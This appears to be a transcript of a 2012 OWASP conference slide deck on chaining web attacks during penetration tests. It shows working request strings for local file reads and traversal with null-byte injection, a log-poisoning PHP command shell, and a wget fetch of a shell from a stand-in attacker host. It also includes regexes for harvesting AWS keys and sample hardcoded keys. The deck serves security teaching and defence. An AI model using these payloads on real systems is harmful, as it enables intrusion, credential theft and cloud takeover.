attack chaining: advanced maneuvers for hack fu
DESCRIPTION
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.TRANSCRIPT
![Page 1: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/1.jpg)
Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL
31 May 2012
![Page 2: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/2.jpg)
About Us W H O A R E T H E S D U D E S ?
• Rob Sr. Security Associate @ Stach & Liu
2
• Oscar Security Associate @ Stach & Liu
![Page 3: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/3.jpg)
3
Penetration Test vs.
Vulnerability Assessment
![Page 4: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/4.jpg)
4
vs.
![Page 5: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/5.jpg)
5
Simulate a real world attack against a target network or application.
- EVERYBODY
![Page 6: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/6.jpg)
6
It answers the question, “could someone break in?”
![Page 7: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/7.jpg)
Penetration Testing
3
4a 4b 1
2 Information Gathering
Exploit & ���Penetrate
Escalate Privileges
Maintain Access
Deny Access
![Page 8: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/8.jpg)
Pen Testing Scenario
8
• Web application penetration test • Cloud-based infrastructure hosts multiple
sites • Out-sourced PHP development to many
contractors • Determine attackers ability to
compromise PII or infrastructure
![Page 9: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/9.jpg)
Step 1 – Explore
9
![Page 10: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/10.jpg)
Step 2 – Read Code
10
http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ...
![Page 11: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/11.jpg)
Step 3 – Proxy?
11
http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com
![Page 12: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/12.jpg)
Step 4 – Read Local Files!
12
http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd
![Page 13: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/13.jpg)
Attack Chaining – Maneuver 1
13
![Page 14: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/14.jpg)
Attack Chaining – Maneuver 1
14
![Page 15: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/15.jpg)
Step 5 – Gather More Info
15
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf
![Page 16: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/16.jpg)
Step 6 – Keep Going…
16
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
![Page 17: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/17.jpg)
Step 6 – Keep Going…
17
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
<VirtualHost *> ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log
</VirtualHost>
![Page 18: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/18.jpg)
Step 7 – Back to DirBuster
18
![Page 19: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/19.jpg)
Step 8 – Review Code
19
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
![Page 20: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/20.jpg)
Step 8 – Review Code
20
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
<?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ?>
![Page 21: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/21.jpg)
Attack Chaining – Maneuver 2
21
![Page 22: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/22.jpg)
Attack Chaining – Maneuver 2
22
![Page 23: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/23.jpg)
Step 9 – Null Byte Injection
23
http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00
![Page 24: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/24.jpg)
Step 8 – Review Code
24
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
<?php require_once('includes/config.php'); $module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module']; $action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action']; $currentModuleFile = 'modules/'.$module.'/'.$action.'.php'; include($currentModuleFile) exit; ?>
![Page 25: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/25.jpg)
Step 10 – Review Gathered Info
25
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
![Page 26: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/26.jpg)
Step 10 – Back to Virtual Conf
26
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf
<VirtualHost *> ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log
</VirtualHost>
![Page 27: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/27.jpg)
Step 11 – Where To Stick It?
27
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
![Page 28: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/28.jpg)
Step 12 – Poison Logs
28
![Page 29: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/29.jpg)
Step 12 – Poison Logs
29
![Page 30: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/30.jpg)
Step 12 – Poison Logs
30
<? echo '<pre>'; passthru(\$_GET['cmd']); echo '</pre>'; ?>
![Page 31: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/31.jpg)
Step 13 – PHP in the Log
31
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
![Page 32: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/32.jpg)
Step 13 – PHP in the Log
32
http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo '<pre>';passthru(\$_GET['cmd']);echo '<pre>'; ?>
![Page 33: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/33.jpg)
Step 14 – Execute Code
33
http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls;
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
![Page 34: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/34.jpg)
Step 14 – Execute Code
34
<? echo '<pre>'; passthru('ls'); echo '</pre>'; ?>
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
![Page 35: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/35.jpg)
Attack Chaining – Maneuver 3
35
![Page 36: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/36.jpg)
Attack Chaining – Maneuver 3
36
![Page 37: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/37.jpg)
Step 15 – Upload Shell
37
http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=wget%20http://attacker.com/gny.php;
![Page 38: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/38.jpg)
Step 16 – Enjoy!
38
![Page 39: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/39.jpg)
Step 17 – I want more!
39
ec2[^\d]["'][A-Z0-9]{20}["'] ec2.*["'][A-Z0-9]{20}["'] ["'][A-Za-z0-9+/]{40}["'] ec2.*["'][A-Z0-9]{20}["'] ec2(\D)*["'][A-Z0-9]{20}["'] amazon.*["'][A-Z0-9]{20}["'] (amazon|ec2).*["'][A-Z0-9]{20}["'] amazon(\D)*["'][A-Z0-9]{20}["'] access secret ["'][A-Z0-9]{20}["'] [A-Za-z0-9+/]{40} amazon.*["'][A-Z0-9]{20}["'].*["'][A-Za-z0-9+/]{40}["'] aws.*["'][A-Z0-9]{20}["'] ["'][A-Za-z0-9+/]{40}["'] amazon.*["'][A-Z0-9]{20}["'] ["'][A-Za-z0-9+/]{40}["'] secret.*["'][A-Za-z0-9+/]{40}["'] ["'][A-Za-z0-9+/]{40}["'].*amazon
![Page 40: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/40.jpg)
Step 18 – Amazon AWS Regex
40
$this-‐>amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628', $aws_key = '8AFB5AF55D1E6620EE1'; define('AMAZON_KEY', '372B8E408D1484C538F'); if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884'); //if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C'); define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
![Page 41: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/41.jpg)
Step 19 – AWS Takeover
41
![Page 42: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/42.jpg)
42
Step 20 – Make It Your Own
![Page 43: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/43.jpg)
1. Found 8 Amazon Secret Keys to access Amazon S3 2. Found that 2 of the 8 have administrator access to
Amazon EC2 3. Attacker launches 100 Extra Large Clusters
Cost of Amazon Cloud Compromise
43
$1,049,000
CRITICAL EXPOSURE
![Page 44: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/44.jpg)
1. Found 8 Amazon Secret Keys to access Amazon S3 2. Found that 2 of the 8 have administrator access to
Amazon EC2 3. Attacker shuts down and deletes all servers and
backups permanently
Take Them Off The Web
44
PRICELESS
CRITICAL EXPOSURE
![Page 45: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/45.jpg)
Attack Chaining – Hack Fu
45
![Page 46: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/46.jpg)
Attack Chaining – Hack Fu
46
![Page 47: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/47.jpg)
Why Is This Happening?
1. Local File Include • File Read Only • Code Execution
2. Null Byte Injection 3. Log Poisoning
47
4. Insecure Credential Storage
5. Overly Permissive Amazon AWS Keys
6. Sensitive Information Disclosure
![Page 48: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/48.jpg)
Web à Mass Malware Deployment
48
![Page 49: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/49.jpg)
Web à Data Center Compromise
49
![Page 50: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/50.jpg)
Web à Internal Network Compromise
50
![Page 51: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/51.jpg)
Internal Assessmentà SSN & Bank #’s
51
![Page 52: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/52.jpg)
Infrastructure Review
52
![Page 53: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/53.jpg)
Step 1 – Target Wireless
53
![Page 54: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/54.jpg)
Step 1 – Target Wireless
54
![Page 55: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/55.jpg)
Step 2 – Port Scan
55
![Page 56: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/56.jpg)
Step 3 – Test Default Creds
56
![Page 57: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/57.jpg)
Infrastructure Apocalypse
57
![Page 58: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/58.jpg)
Step 4 – Control AP
58
![Page 59: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/59.jpg)
Step 5 – Read All E-mail
59
![Page 60: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/60.jpg)
Step 6 – Listen To VOIP
60
![Page 61: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/61.jpg)
Step 7 – Open All Doors
61
![Page 62: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/62.jpg)
Step 7 – Open All Doors
62
![Page 63: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/63.jpg)
63
![Page 64: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/64.jpg)
Step 7 – Server Room Door
64
![Page 65: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/65.jpg)
Is This Real Life?
1. Insecure Wireless Encryption
2. Improper Network Segmentation
3. Insecure Default Configuration
65
4. Weak Passwords 5. Sensitive Information
Disclosure
![Page 66: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/66.jpg)
Protection – How?
1. People 2. Policy 3. Processes 4. Strategic / Tactical
Security 5. Defense In-Depth
66
![Page 67: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/67.jpg)
Defense In-Depth
67
I S P R O T E C T I O N A G A I N S T. . .
![Page 68: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/68.jpg)
How Do You Get Better?
68
![Page 69: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/69.jpg)
Synthesis and Patterns C A N B E B O T H G O O D A N D B A D
69
![Page 70: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/70.jpg)
Attack Visualization L I K E B O B B Y F I S C H E R
70
![Page 71: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/71.jpg)
![Page 72: Attack Chaining: Advanced Maneuvers for Hack Fu](https://reader033.vdocuments.us/reader033/viewer/2022051816/546c1c28b4af9f7f2c8b4f4e/html5/thumbnails/72.jpg)
Thank You
72